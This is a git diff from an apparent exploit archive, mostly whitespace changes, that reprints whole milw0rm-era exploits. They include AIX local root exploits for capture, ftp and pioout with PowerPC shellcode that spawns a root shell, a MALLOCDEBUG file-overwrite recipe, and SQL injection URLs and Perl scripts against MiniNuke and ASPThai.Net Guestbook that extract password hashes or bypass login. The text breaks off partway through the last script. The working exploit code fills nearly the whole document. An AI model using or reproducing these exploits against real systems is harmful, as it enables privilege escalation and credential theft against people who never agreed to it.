ch; - - printf("\x1b["); - for (i = 0; i < VALCNT; i++) - printf("%lu;", addr); - printf("0A\n"); - fflush(stdout); - - while (read(0, &ch, 1) == 1) - write(1, &ch, 1); - exit(0); - } - - printf("--------------------------------\n"); - printf(" AIX capture Local Root Exploit\n"); - printf(" By qaaz\n"); - printf("--------------------------------\n"); - - if (pipe(pi) < 0) { - perror("[-] pipe"); - exit(1); - } - - if ((ptm = open("/dev/ptc", O_RDWR)) < 0 || - (pts = open(ttyname(ptm), O_RDWR)) < 0) { - perror("[-] pty"); - exit(1); - } - - if ((child = fork()) < 0) { - perror("[-] fork"); - exit(1); - } - - if (child == 0) { - dup2(pts, 0); - dup2(pts, 1); - dup2(pts, 2); - - dup2(pi[0], 3); - - execve(TARGET, args, envs); - perror("[-] execve"); - exit(1); - } - - close(pi[0]); - close(pts); - - sleep(1); - read(ptm, buf, sizeof(buf)); - - write(ptm, " ", 1); - shell((int[2]) { 0, pi[1] }, (int[2]) { ptm, 1 }); - kill(child, SIGTERM); - waitpid(child, NULL, 0); - return 0; -} - -// milw0rm.com [2007-07-27] +/* 07/2007: public release + * IBM AIX <= 5.3 sp6 + * + * AIX capture Local Root Exploit + * By qaaz + */ +#include +#include +#include + +#include +#include +#include +#include + +#define TARGET "/usr/bin/capture" +#define VALCNT 40 + +#define MAX(x,y) ((x) > (y) ? (x) : (y)) +#define ALIGN(x,y) (((x) + (y) - 1) / (y) * (y)) + +unsigned char qaazcode[] = +"\x60\x60\x60\x60\x60\x60\x60\x60" +"\x7c\x63\x1a\x79\x40\x82\xff\xfd" +"\x7e\xa8\x02\xa6\x3a\xb5\x01\x01" +"\x88\x55\xff\x5b\x3a\xd5\xff\x1b" +"\x7e\xc8\x03\xa6\x4c\xc6\x33\x42" +"\x44\xff\xff\x02\x38\x75\xff\x5f" +"\x38\x63\x01\x01\x88\x95\xff\x5d" +"\x38\x63\x01\x02\x38\x63\xfe\xff" +"\x88\xa3\xfe\xff\x7c\x04\x28\x40" +"\x40\x82\xff\xf0\x7c\xa5\x2a\x78" +"\x98\xa3\xfe\xff\x88\x55\xff\x5c" +"\x38\x75\xff\x5f\x38\x81\xff\xf8" +"\x90\x61\xff\xf8\x90\xa1\xff\xfc" +"\x4b\xff\xff\xbd\xb8\x05\x7c\xff"; + +void shell(int p1[2], int p2[2]) +{ + ssize_t n; + fd_set rset; + char buf[4096]; + + for (;;) { + FD_ZERO(&rset); + FD_SET(p1[0], &rset); + FD_SET(p2[0], &rset); + + n = select(MAX(p1[0], p2[0]) + 1, + &rset, NULL, NULL, NULL); + if (n < 0) { + perror("[-] select"); + break; + } + + if (FD_ISSET(p1[0], &rset)) { + n = read(p1[0], buf, sizeof(buf)); + if (n <= 0) break; + write(p1[1], buf, n); + } + if (FD_ISSET(p2[0], &rset)) { + n = read(p2[0], buf, sizeof(buf)); + if (n <= 0) break; + write(p2[1], buf, n); + } + } +} + +/* just because you don't understand it doesn't mean it has to be wrong */ +ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[]) +{ + ulong top, len, off; + int i; + + len = 0; + for (i = 0; argv[i]; i++) + len += strlen(argv[i]) + 1; + for (i = 0; envp[i]; i++) + len += strlen(envp[i]) + 1; + top = (ulong) argv[0] + ALIGN(len, 8); + + len = off = 0; + for (i = 0; args[i]; i++) + len += strlen(args[i]) + 1; + for (i = 0; envs[i]; i++) { + if (!strncmp(envs[i], "EGG=", 4)) + off = len + 4; + len += strlen(envs[i]) + 1; + } + while (off & 3) + strcat(envs[0], "X"), off++, len++; + + return top - ALIGN(len, 4) + off; +} + +int main(int argc, char *argv[], char *envp[]) +{ + char pad[16] = "PAD=X", egg[512], bsh[128], buf[1024]; + char *args[] = { TARGET, "/dev/null", NULL }; + char *envs[] = { pad, bsh, egg, NULL }; + int ptm, pts, pi[2]; + pid_t child; + ulong addr; + + sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid()); + sprintf(bsh, "SHELL=/proc/%d/object/a.out", getpid()); + addr = get_addr(argv, envp, args, envs); + + if (!envp[0]) { + dup2(3, 0); + + setuid(geteuid()); + putenv("HISTFILE=/dev/null"); + execl("/bin/bash", "bash", "-i", NULL); + execl("/bin/sh", "sh", "-i", NULL); + perror("[-] execl"); + exit(1); + } else if (argc && !strcmp(argv[0], "bsh")) { + char i, ch; + + printf("\x1b["); + for (i = 0; i < VALCNT; i++) + printf("%lu;", addr); + printf("0A\n"); + fflush(stdout); + + while (read(0, &ch, 1) == 1) + write(1, &ch, 1); + exit(0); + } + + printf("--------------------------------\n"); + printf(" AIX capture Local Root Exploit\n"); + printf(" By qaaz\n"); + printf("--------------------------------\n"); + + if (pipe(pi) < 0) { + perror("[-] pipe"); + exit(1); + } + + if ((ptm = open("/dev/ptc", O_RDWR)) < 0 || + (pts = open(ttyname(ptm), O_RDWR)) < 0) { + perror("[-] pty"); + exit(1); + } + + if ((child = fork()) < 0) { + perror("[-] fork"); + exit(1); + } + + if (child == 0) { + dup2(pts, 0); + dup2(pts, 1); + dup2(pts, 2); + + dup2(pi[0], 3); + + execve(TARGET, args, envs); + perror("[-] execve"); + exit(1); + } + + close(pi[0]); + close(pts); + + sleep(1); + read(ptm, buf, sizeof(buf)); + + write(ptm, " ", 1); + shell((int[2]) { 0, pi[1] }, (int[2]) { ptm, 1 }); + kill(child, SIGTERM); + waitpid(child, NULL, 0); + return 0; +} + +// milw0rm.com [2007-07-27] diff --git a/platforms/aix/local/4232.sh b/platforms/aix/local/4232.sh index 66b796a69..39717685f 100755 --- a/platforms/aix/local/4232.sh +++ b/platforms/aix/local/4232.sh @@ -1,29 +1,29 @@ -#!/bin/sh -# -# 07/2007: public release -# IBM AIX <= 5.3 sp6 -# -echo "-------------------------------" -echo " AIX pioout Local Root Exploit " -echo " By qaaz" -echo "-------------------------------" -cat >piolib.c <<_EOF_ -#include -#include -void init() __attribute__ ((constructor)); -void init() -{ - seteuid(0); - setuid(0); - putenv("HISTFILE=/dev/null"); - execl("/bin/bash", "bash", "-i", (void *) 0); - execl("/bin/sh", "sh", "-i", (void *) 0); - perror("execl"); - exit(1); -} -_EOF_ -gcc piolib.c -o piolib -shared -fPIC -[ -r piolib ] && /usr/lpd/pio/etc/pioout -R ./piolib -rm -f piolib.c piolib - -# milw0rm.com [2007-07-27] +#!/bin/sh +# +# 07/2007: public release +# IBM AIX <= 5.3 sp6 +# +echo "-------------------------------" +echo " AIX pioout Local Root Exploit " +echo " By qaaz" +echo "-------------------------------" +cat >piolib.c <<_EOF_ +#include +#include +void init() __attribute__ ((constructor)); +void init() +{ + seteuid(0); + setuid(0); + putenv("HISTFILE=/dev/null"); + execl("/bin/bash", "bash", "-i", (void *) 0); + execl("/bin/sh", "sh", "-i", (void *) 0); + perror("execl"); + exit(1); +} +_EOF_ +gcc piolib.c -o piolib -shared -fPIC +[ -r piolib ] && /usr/lpd/pio/etc/pioout -R ./piolib +rm -f piolib.c piolib + +# milw0rm.com [2007-07-27] diff --git a/platforms/aix/local/4233.c b/platforms/aix/local/4233.c index 751e2e04a..cb2417c56 100755 --- a/platforms/aix/local/4233.c +++ b/platforms/aix/local/4233.c @@ -1,157 +1,157 @@ -/* 07/2007: public release - * IBM AIX <= 5.3 sp6 - * - * AIX ftp Local Root Exploit - * By qaaz - */ -#include -#include -#include - -#include -#include -#include - -#define TARGET "/usr/bin/ftp" -#define OVERLEN 300 - -#define MAX(x,y) ((x) > (y) ? (x) : (y)) -#define ALIGN(x,y) (((x) + (y) - 1) / (y) * (y)) - -unsigned char qaazcode[] = -"\x60\x60\x60\x60\x60\x60\x60\x60" -"\x7c\x63\x1a\x79\x40\x82\xff\xfd" -"\x7e\xa8\x02\xa6\x3a\xb5\x01\x01" -"\x88\x55\xff\x5b\x3a\xd5\xff\x1b" -"\x7e\xc8\x03\xa6\x4c\xc6\x33\x42" -"\x44\xff\xff\x02\x38\x75\xff\x5f" -"\x38\x63\x01\x01\x88\x95\xff\x5d" -"\x38\x63\x01\x02\x38\x63\xfe\xff" -"\x88\xa3\xfe\xff\x7c\x04\x28\x40" -"\x40\x82\xff\xf0\x7c\xa5\x2a\x78" -"\x98\xa3\xfe\xff\x88\x55\xff\x5c" -"\x38\x75\xff\x5f\x38\x81\xff\xf8" -"\x90\x61\xff\xf8\x90\xa1\xff\xfc" -"\x4b\xff\xff\xbd\xb8\x05\x7c\xff"; - -void shell(int p1[2], int p2[2]) -{ - ssize_t n; - fd_set rset; - char buf[4096]; - - for (;;) { - FD_ZERO(&rset); - FD_SET(p1[0], &rset); - FD_SET(p2[0], &rset); - - n = select(MAX(p1[0], p2[0]) + 1, - &rset, NULL, NULL, NULL); - if (n < 0) { - perror("[-] select"); - break; - } - - if (FD_ISSET(p1[0], &rset)) { - n = read(p1[0], buf, sizeof(buf)); - if (n <= 0) break; - write(p1[1], buf, n); - } - if (FD_ISSET(p2[0], &rset)) { - n = read(p2[0], buf, sizeof(buf)); - if (n <= 0) break; - write(p2[1], buf, n); - } - } -} - -/* just because you don't understand it doesn't mean it has to be wrong */ -ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[]) -{ - ulong top, len, off; - int i; - - len = 0; - for (i = 0; argv[i]; i++) - len += strlen(argv[i]) + 1; - for (i = 0; envp[i]; i++) - len += strlen(envp[i]) + 1; - top = (ulong) argv[0] + ALIGN(len, 8); - - len = off = 0; - for (i = 0; args[i]; i++) - len += strlen(args[i]) + 1; - for (i = 0; envs[i]; i++) { - if (!strncmp(envs[i], "EGG=", 4)) - off = len + 4; - len += strlen(envs[i]) + 1; - } - while (off & 3) - strcat(envs[0], "X"), off++, len++; - - return top - ALIGN(len, 4) + off; -} - -int main(int argc, char *argv[], char *envp[]) -{ - char pad[16] = "PAD=X", egg[512]; - char *args[] = { TARGET, NULL }; - char *envs[] = { pad, egg, NULL }; - int pi[2], po[2], i; - pid_t child; - ulong addr; - - sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid()); - - if (!envp[0]) { - setuid(geteuid()); - putenv("HISTFILE=/dev/null"); - execl("/bin/bash", "bash", "-i", NULL); - execl("/bin/sh", "sh", "-i", NULL); - perror("[-] execl"); - exit(1); - } - - printf("----------------------------\n"); - printf(" AIX ftp Local Root Exploit\n"); - printf(" By qaaz\n"); - printf("----------------------------\n"); - - if (pipe(pi) < 0 || pipe(po) < 0) { - perror("[-] pipe"); - exit(1); - } - - addr = get_addr(argv, envp, args, envs); - - if ((child = fork()) < 0) { - perror("[-] fork"); - exit(1); - } - - if (child == 0) { - dup2(pi[0], 0); - dup2(po[1], 1); - dup2(po[1], 2); - execve(TARGET, args, envs); - perror("[-] execve"); - exit(1); - } - - write(pi[1], "macdef foo\n\n$\nfoo ab", 20); - for (i = 0; i < OVERLEN; i += sizeof(addr)) - write(pi[1], &addr, sizeof(addr)); - write(pi[1], "\n", 1); - - fflush(stdout); - fflush(stderr); - - close(pi[0]); - close(po[1]); - shell((int[2]) { 0, pi[1] }, (int[2]) { po[0], 1 }); - kill(child, SIGTERM); - waitpid(child, NULL, 0); - return 0; -} - -// milw0rm.com [2007-07-27] +/* 07/2007: public release + * IBM AIX <= 5.3 sp6 + * + * AIX ftp Local Root Exploit + * By qaaz + */ +#include +#include +#include + +#include +#include +#include + +#define TARGET "/usr/bin/ftp" +#define OVERLEN 300 + +#define MAX(x,y) ((x) > (y) ? (x) : (y)) +#define ALIGN(x,y) (((x) + (y) - 1) / (y) * (y)) + +unsigned char qaazcode[] = +"\x60\x60\x60\x60\x60\x60\x60\x60" +"\x7c\x63\x1a\x79\x40\x82\xff\xfd" +"\x7e\xa8\x02\xa6\x3a\xb5\x01\x01" +"\x88\x55\xff\x5b\x3a\xd5\xff\x1b" +"\x7e\xc8\x03\xa6\x4c\xc6\x33\x42" +"\x44\xff\xff\x02\x38\x75\xff\x5f" +"\x38\x63\x01\x01\x88\x95\xff\x5d" +"\x38\x63\x01\x02\x38\x63\xfe\xff" +"\x88\xa3\xfe\xff\x7c\x04\x28\x40" +"\x40\x82\xff\xf0\x7c\xa5\x2a\x78" +"\x98\xa3\xfe\xff\x88\x55\xff\x5c" +"\x38\x75\xff\x5f\x38\x81\xff\xf8" +"\x90\x61\xff\xf8\x90\xa1\xff\xfc" +"\x4b\xff\xff\xbd\xb8\x05\x7c\xff"; + +void shell(int p1[2], int p2[2]) +{ + ssize_t n; + fd_set rset; + char buf[4096]; + + for (;;) { + FD_ZERO(&rset); + FD_SET(p1[0], &rset); + FD_SET(p2[0], &rset); + + n = select(MAX(p1[0], p2[0]) + 1, + &rset, NULL, NULL, NULL); + if (n < 0) { + perror("[-] select"); + break; + } + + if (FD_ISSET(p1[0], &rset)) { + n = read(p1[0], buf, sizeof(buf)); + if (n <= 0) break; + write(p1[1], buf, n); + } + if (FD_ISSET(p2[0], &rset)) { + n = read(p2[0], buf, sizeof(buf)); + if (n <= 0) break; + write(p2[1], buf, n); + } + } +} + +/* just because you don't understand it doesn't mean it has to be wrong */ +ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[]) +{ + ulong top, len, off; + int i; + + len = 0; + for (i = 0; argv[i]; i++) + len += strlen(argv[i]) + 1; + for (i = 0; envp[i]; i++) + len += strlen(envp[i]) + 1; + top = (ulong) argv[0] + ALIGN(len, 8); + + len = off = 0; + for (i = 0; args[i]; i++) + len += strlen(args[i]) + 1; + for (i = 0; envs[i]; i++) { + if (!strncmp(envs[i], "EGG=", 4)) + off = len + 4; + len += strlen(envs[i]) + 1; + } + while (off & 3) + strcat(envs[0], "X"), off++, len++; + + return top - ALIGN(len, 4) + off; +} + +int main(int argc, char *argv[], char *envp[]) +{ + char pad[16] = "PAD=X", egg[512]; + char *args[] = { TARGET, NULL }; + char *envs[] = { pad, egg, NULL }; + int pi[2], po[2], i; + pid_t child; + ulong addr; + + sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid()); + + if (!envp[0]) { + setuid(geteuid()); + putenv("HISTFILE=/dev/null"); + execl("/bin/bash", "bash", "-i", NULL); + execl("/bin/sh", "sh", "-i", NULL); + perror("[-] execl"); + exit(1); + } + + printf("----------------------------\n"); + printf(" AIX ftp Local Root Exploit\n"); + printf(" By qaaz\n"); + printf("----------------------------\n"); + + if (pipe(pi) < 0 || pipe(po) < 0) { + perror("[-] pipe"); + exit(1); + } + + addr = get_addr(argv, envp, args, envs); + + if ((child = fork()) < 0) { + perror("[-] fork"); + exit(1); + } + + if (child == 0) { + dup2(pi[0], 0); + dup2(po[1], 1); + dup2(po[1], 2); + execve(TARGET, args, envs); + perror("[-] execve"); + exit(1); + } + + write(pi[1], "macdef foo\n\n$\nfoo ab", 20); + for (i = 0; i < OVERLEN; i += sizeof(addr)) + write(pi[1], &addr, sizeof(addr)); + write(pi[1], "\n", 1); + + fflush(stdout); + fflush(stderr); + + close(pi[0]); + close(po[1]); + shell((int[2]) { 0, pi[1] }, (int[2]) { po[0], 1 }); + kill(child, SIGTERM); + waitpid(child, NULL, 0); + return 0; +} + +// milw0rm.com [2007-07-27] diff --git a/platforms/aix/local/898.sh b/platforms/aix/local/898.sh index ad79b9640..b76b107ff 100755 --- a/platforms/aix/local/898.sh +++ b/platforms/aix/local/898.sh @@ -20,6 +20,6 @@ export PATH /usr/sbin/invscout PATH="/usr/bin:/usr/sbin:/usr/local/bin:/bin:./" export PATH -exec /tmp/ksh - -# milw0rm.com [2005-03-25] +exec /tmp/ksh + +# milw0rm.com [2005-03-25] diff --git a/platforms/aix/local/9306.txt b/platforms/aix/local/9306.txt index c8c6189c6..b4b0193b2 100755 --- a/platforms/aix/local/9306.txt +++ b/platforms/aix/local/9306.txt @@ -1,33 +1,33 @@ -#!/bin/bash -################################################################# -# _______ _________ _ # -# ( ____ )\__ __/( ( /| # -# | ( )| ) ( | \ ( | # -# | (____)| | | | \ | | # -# | __) | | | (\ \) | # -# | (\ ( | | | | \ | # -# | ) \ \__ | | | ) \ | # -# |/ \__/ )_( |/ )_) # -# http://root-the.net # -################################################################# -#[+] IBM AIX libc MALLOCDEBUG File Overwrite Vulnerability # -#[+] Refer : securitytracker.com/id?1022261 # -#[+] Exploit : Affix # -#[+] Tested on : IBM AIX # -#[+] Greetz : Mad-Hatter, Atomiku, RTN, Terogen, SCD, Boxhead, # -# str0ke, tekto, SonicX, Android, tw0, d0nk, Redskull # -# AIX 5.3 ML 5 is where this bad libc code was added. # -# Libs Affected : # -# /usr/ccs/lib/libc.a # -# /usr/ccs/lib/libp/libc.a # -################################################################# - -Set the following environment variables: - -umask 000 -MALLOCTYPE=debug -MALLOCDEBUG=report_allocations,output:/bin/filename - -echo "Now run any setuid root binary.. /bin/filename will be created with 777 permissions." - -# milw0rm.com [2009-07-30] +#!/bin/bash +################################################################# +# _______ _________ _ # +# ( ____ )\__ __/( ( /| # +# | ( )| ) ( | \ ( | # +# | (____)| | | | \ | | # +# | __) | | | (\ \) | # +# | (\ ( | | | | \ | # +# | ) \ \__ | | | ) \ | # +# |/ \__/ )_( |/ )_) # +# http://root-the.net # +################################################################# +#[+] IBM AIX libc MALLOCDEBUG File Overwrite Vulnerability # +#[+] Refer : securitytracker.com/id?1022261 # +#[+] Exploit : Affix # +#[+] Tested on : IBM AIX # +#[+] Greetz : Mad-Hatter, Atomiku, RTN, Terogen, SCD, Boxhead, # +# str0ke, tekto, SonicX, Android, tw0, d0nk, Redskull # +# AIX 5.3 ML 5 is where this bad libc code was added. # +# Libs Affected : # +# /usr/ccs/lib/libc.a # +# /usr/ccs/lib/libp/libc.a # +################################################################# + +Set the following environment variables: + +umask 000 +MALLOCTYPE=debug +MALLOCDEBUG=report_allocations,output:/bin/filename + +echo "Now run any setuid root binary.. /bin/filename will be created with 777 permissions." + +# milw0rm.com [2009-07-30] diff --git a/platforms/aix/shellcode/13241.txt b/platforms/aix/shellcode/13241.txt index 19c3a7671..269dd6baa 100755 --- a/platforms/aix/shellcode/13241.txt +++ b/platforms/aix/shellcode/13241.txt @@ -35,6 +35,6 @@ unsigned int code[]={ 80010444 lwz r0,1092(SP) --jump 7c0903a6 mtspr CTR,r0 4e800420 bctr --jump -*/ - +*/ + # milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/asp/webapps/1010.pl b/platforms/asp/webapps/1010.pl index 613ef085f..7c4b2f3ee 100755 --- a/platforms/asp/webapps/1010.pl +++ b/platforms/asp/webapps/1010.pl @@ -71,6 +71,6 @@ print "User: admin\n"; print "Pass: trapset\n\n"; print "Enjoy ;)\n"; print "\n"; -### EOF ### - -# milw0rm.com [2005-05-26] +### EOF ### + +# milw0rm.com [2005-05-26] diff --git a/platforms/asp/webapps/1011.php b/platforms/asp/webapps/1011.php index 6dab56606..807294640 100755 --- a/platforms/asp/webapps/1011.php +++ b/platforms/asp/webapps/1011.php @@ -30,6 +30,6 @@ print "Member key: "; print ""; } -?> - -# milw0rm.com [2005-05-26] +?> + +# milw0rm.com [2005-05-26] diff --git a/platforms/asp/webapps/1012.txt b/platforms/asp/webapps/1012.txt index c83b4b5c9..0dddbffbe 100755 --- a/platforms/asp/webapps/1012.txt +++ b/platforms/asp/webapps/1012.txt @@ -33,6 +33,6 @@ size="150">
------------------End------------------- - -# milw0rm.com [2005-05-26] +-----------------End------------------- + +# milw0rm.com [2005-05-26] diff --git a/platforms/asp/webapps/1015.txt b/platforms/asp/webapps/1015.txt index 14214c22a..e37103833 100755 --- a/platforms/asp/webapps/1015.txt +++ b/platforms/asp/webapps/1015.txt @@ -32,6 +32,6 @@ firstname : - -# milw0rm.com [2005-05-27] +Now u can use forgot password to gain passwords! --> + +# milw0rm.com [2005-05-27] diff --git a/platforms/asp/webapps/1070.pl b/platforms/asp/webapps/1070.pl index 0a5d072e9..b33dbb7d8 100755 --- a/platforms/asp/webapps/1070.pl +++ b/platforms/asp/webapps/1070.pl @@ -47,6 +47,6 @@ print "Wait For Changing Password ...\n"; print "[+]OK , Now Login With : \n"; print "Username: trapset\n"; print "Password: trapset\n\n"; - - -# milw0rm.com [2005-06-27] + + +# milw0rm.com [2005-06-27] diff --git a/platforms/asp/webapps/1071.pl b/platforms/asp/webapps/1071.pl index 0630ce2e7..0a8454fdf 100755 --- a/platforms/asp/webapps/1071.pl +++ b/platforms/asp/webapps/1071.pl @@ -23,6 +23,6 @@ $page=~m/the varchar value '(.*?)' to a column/ && print "[+] Username of admin print "[-] Unable to retrieve Username\n" if(!$1); $page=get($ARGV[0]."module/support/task/comment_post.asp?TaskID=Password") || die "[-] Unable to retrieve: $!"; $page=~m/the varchar value '(.*?)' to a column/ && print "[+] SHA256 hash of password is: $1\n"; -print "[-] Unable to retrieve hash of password\n" if(!$1); - -# milw0rm.com [2005-06-27] +print "[-] Unable to retrieve hash of password\n" if(!$1); + +# milw0rm.com [2005-06-27] diff --git a/platforms/asp/webapps/1112.txt b/platforms/asp/webapps/1112.txt index 44ac9e4aa..0e2bb353f 100755 --- a/platforms/asp/webapps/1112.txt +++ b/platforms/asp/webapps/1112.txt @@ -104,6 +104,6 @@ hostcustid: - - -# milw0rm.com [2005-07-18] + + +# milw0rm.com [2005-07-18] diff --git a/platforms/asp/webapps/1252.htm b/platforms/asp/webapps/1252.htm index 493ba208f..d53aac828 100755 --- a/platforms/asp/webapps/1252.htm +++ b/platforms/asp/webapps/1252.htm @@ -1,44 +1,44 @@ - - - -
- - - - -
- - -# milw0rm.com [2005-10-15] + + + +
+ + + + +
+ + +# milw0rm.com [2005-10-15] diff --git a/platforms/asp/webapps/1418.txt b/platforms/asp/webapps/1418.txt index 7019f0a86..e5de32e2d 100755 --- a/platforms/asp/webapps/1418.txt +++ b/platforms/asp/webapps/1418.txt @@ -1,59 +1,59 @@ -Contacts:{ -ICQ: 10072 -MSN/Email: nukedx@nukedx.com -Web: http://www.nukedx.com -} - - ---- -Vendor: MiniNuke (www.miniex.net) -Version: 1.8.2 and prior versions must be affected. -About:Via this method remote attacker can inject SQL query to the news.asp ---- -How&Example: GET -> http://[site]/news.asp?Action=Print&hid=[SQLQuery] -http://www.miniex.net/news.asp?Action=Print&hid=66%20union+select+0,sifre,0,0,0,0,0,0,0,0+from+members+where+uye_id=52 - -Columns of MEMBERS: -uye_id = userid -sifre = md5 password hash -g_soru = secret question. -g_cevap = secret answer -email = mail address -isim = name -icq = ICQ Uin -msn = MSN Sn. -aim = AIM Sn. -meslek = job -cinsiyet = gender -yas = age -url = url -imza = signature -mail_goster = show mail :P -avurl = avatar url -avatar = avatar - - ---- -Vendor: MiniNuke (www.miniex.net) -Version: 1.8.2 and prior versions must be affected. -About:Via this method remote attacker can change any users password without login. ---- -How&Example: -HTML Example -[code] - -MiniNuke <= 1.8.2 remote user password change -
- - - - - - - -
Now fill in the blanks
Change password
PASSWORD:
PASSWORD Again :    -
- -[/code] - -# milw0rm.com [2006-01-14] +Contacts:{ +ICQ: 10072 +MSN/Email: nukedx@nukedx.com +Web: http://www.nukedx.com +} + + +--- +Vendor: MiniNuke (www.miniex.net) +Version: 1.8.2 and prior versions must be affected. +About:Via this method remote attacker can inject SQL query to the news.asp +--- +How&Example: GET -> http://[site]/news.asp?Action=Print&hid=[SQLQuery] +http://www.miniex.net/news.asp?Action=Print&hid=66%20union+select+0,sifre,0,0,0,0,0,0,0,0+from+members+where+uye_id=52 + +Columns of MEMBERS: +uye_id = userid +sifre = md5 password hash +g_soru = secret question. +g_cevap = secret answer +email = mail address +isim = name +icq = ICQ Uin +msn = MSN Sn. +aim = AIM Sn. +meslek = job +cinsiyet = gender +yas = age +url = url +imza = signature +mail_goster = show mail :P +avurl = avatar url +avatar = avatar + + +--- +Vendor: MiniNuke (www.miniex.net) +Version: 1.8.2 and prior versions must be affected. +About:Via this method remote attacker can change any users password without login. +--- +How&Example: +HTML Example +[code] + +MiniNuke <= 1.8.2 remote user password change +
+ + + + + + + +
Now fill in the blanks
Change password
PASSWORD:
PASSWORD Again :    +
+ +[/code] + +# milw0rm.com [2006-01-14] diff --git a/platforms/asp/webapps/1419.pl b/platforms/asp/webapps/1419.pl index 18d013c30..1d8236afb 100755 --- a/platforms/asp/webapps/1419.pl +++ b/platforms/asp/webapps/1419.pl @@ -1,53 +1,53 @@ -#!/usr/bin/perl - -# MiniNuke (www.miniex.net) Version: <= 1.8.2 SQL-injection exploit. -# This exploit uses the vulnerability discovered by nukedx@nukedx.com. -# Exploit uses SQl-injection to give you the hash from user with chosen id. -# DetMyl, 2006 Detmyl@bk.ru - -use IO::Socket; - -if (@ARGV < 3) - { - print q( - +++++++++++++++++++++++++++++++++++++++++++++++++++ - Usage: perl mini-nuke.pl [site] [dir] [useId] [proxy (optional)] - i.e. perl mini-nuke.pl "somesite.com" / 52 127.0.0.1:3128 - ++++++++++++++++++++++++++++++++++++++++++++++++++++ - ); - exit; - } -$serv = $ARGV[0]; -$dir = $ARGV[1]; -$uid = $ARGV[2]; -$proxy = $ARGV[3]; - -print "----------------------------------\n"; -if ( defined $proxy) { - $proxy =~ s/(http:\/\/)//eg; - ($proxyAddr,$proxyPort) = split(/:/, $proxy); - } -$serv =~ s/(http:\/\/)//eg; -$request ="http://".$serv.$dir."news.asp?Action=Print&hid=66%20union+select+0,sifre,0,0,0,0,0,0,0,0+from+members+where+uye_id=".$uid; -print "Connecting to: $serv...\n"; -print $proxy?"Using proxy: $proxy \n":""; -$socket = IO::Socket::INET->new( Proto => "tcp", - PeerAddr => $proxyAddr?"$proxyAddr":"$serv", - PeerPort => $proxyPort?"$proxyPort":"80") - || die "can't connect to: $serv\n"; -print $socket "GET $request HTTP/1.1\n"; -print $socket "Host: $serv\n"; -print $socket "Accept: */*\n"; -print $socket "Connection: close\n\n"; -print "+ Connected!...\n"; - while($answer = <$socket>) { - if ($answer =~ /([\d,a-f]{32})<\/b>/) { - print "+ Found! The hash for user $uid: $1\n"; - print "----------------------------------\n"; - exit(); } - if ($answer =~ /number of columns/) { print "+ Vulnerable! But no result with default querry, so manually change the scrypt;-)...\n";exit(); } - } -print "Exploit failed\n"; -print "--------------------------\n"; - -# milw0rm.com [2006-01-14] +#!/usr/bin/perl + +# MiniNuke (www.miniex.net) Version: <= 1.8.2 SQL-injection exploit. +# This exploit uses the vulnerability discovered by nukedx@nukedx.com. +# Exploit uses SQl-injection to give you the hash from user with chosen id. +# DetMyl, 2006 Detmyl@bk.ru + +use IO::Socket; + +if (@ARGV < 3) + { + print q( + +++++++++++++++++++++++++++++++++++++++++++++++++++ + Usage: perl mini-nuke.pl [site] [dir] [useId] [proxy (optional)] + i.e. perl mini-nuke.pl "somesite.com" / 52 127.0.0.1:3128 + ++++++++++++++++++++++++++++++++++++++++++++++++++++ + ); + exit; + } +$serv = $ARGV[0]; +$dir = $ARGV[1]; +$uid = $ARGV[2]; +$proxy = $ARGV[3]; + +print "----------------------------------\n"; +if ( defined $proxy) { + $proxy =~ s/(http:\/\/)//eg; + ($proxyAddr,$proxyPort) = split(/:/, $proxy); + } +$serv =~ s/(http:\/\/)//eg; +$request ="http://".$serv.$dir."news.asp?Action=Print&hid=66%20union+select+0,sifre,0,0,0,0,0,0,0,0+from+members+where+uye_id=".$uid; +print "Connecting to: $serv...\n"; +print $proxy?"Using proxy: $proxy \n":""; +$socket = IO::Socket::INET->new( Proto => "tcp", + PeerAddr => $proxyAddr?"$proxyAddr":"$serv", + PeerPort => $proxyPort?"$proxyPort":"80") + || die "can't connect to: $serv\n"; +print $socket "GET $request HTTP/1.1\n"; +print $socket "Host: $serv\n"; +print $socket "Accept: */*\n"; +print $socket "Connection: close\n\n"; +print "+ Connected!...\n"; + while($answer = <$socket>) { + if ($answer =~ /([\d,a-f]{32})<\/b>/) { + print "+ Found! The hash for user $uid: $1\n"; + print "----------------------------------\n"; + exit(); } + if ($answer =~ /number of columns/) { print "+ Vulnerable! But no result with default querry, so manually change the scrypt;-)...\n";exit(); } + } +print "Exploit failed\n"; +print "--------------------------\n"; + +# milw0rm.com [2006-01-14] diff --git a/platforms/asp/webapps/1472.pl b/platforms/asp/webapps/1472.pl index 3c3901f68..d19ff6a67 100755 --- a/platforms/asp/webapps/1472.pl +++ b/platforms/asp/webapps/1472.pl @@ -1,93 +1,93 @@ -#!/usr/bin/perl -# SQL Injection Exploit for ASPThai.Net Guestbook <= 5.5 -#(And possible higher could not find a site to test it on) -# This exploit shows the username of the administrator and the password In plain text -# Bug Found by muderskillz Coded by Zodiac -# Shouts to cijfer,uid0,|n|ex,ph4tel,z3r0,lethal, Felosi,seven,Spic and anyone else I forgot. -# http://exploitercode.com/ http://www.g00ns.net -#irc.g00ns.net #g00ns email = zodiac@g00ns.net -#(c) 2006 - -use LWP::UserAgent; -use HTTP::Cookies; - -$Server = $ARGV[0]; - -if($Server =~m/http/g) -{ -$Server=~ 'http://$Server'; -print -} -else { - print $error; -} - -if(!$Server) {usage();exit() ;} - -head(); - -print "\r\nGrabbing Username And Password\r\n\n"; - -#Login's and stores a cookie to view admin panel later - - - $xpl = LWP::UserAgent->new() or die; - $cookie_jar = HTTP::Cookies->new(); - - $xpl->agent('g00ns'); - $xpl->cookie_jar($cookie_jar); - - $res = $xpl->post( - $Server.'check_user.asp', - Content => [ - - 'txtUserName' => '\' or \'%67%30%30%6e%73\'=\'%67%30%30%6e%73', - 'txtUserPass' => '\' or \'%67%30%30%6e%73\'=\'%67%30%30%6e%73', - 'Submit' => '-= Login =-', - ], - ); - -# Create a request -my $req = HTTP::Request->new(GET => - -$Server.'change_admin_username.asp' - -); - -$req->header('Referer', $Server.'admin_menu.asp'); - -my $res = $xpl->request($req); - -$info= $res->content; - -if($info =~ m/Unauthorised\sAccess|The\spage\scannot\sbe\sfound/) -{ - die "Error Connecting...\r\n"; -} - -#Check the outcome of the response - -$info=~m/(value=\")(\n+|\w+|\W+)/g; -$User 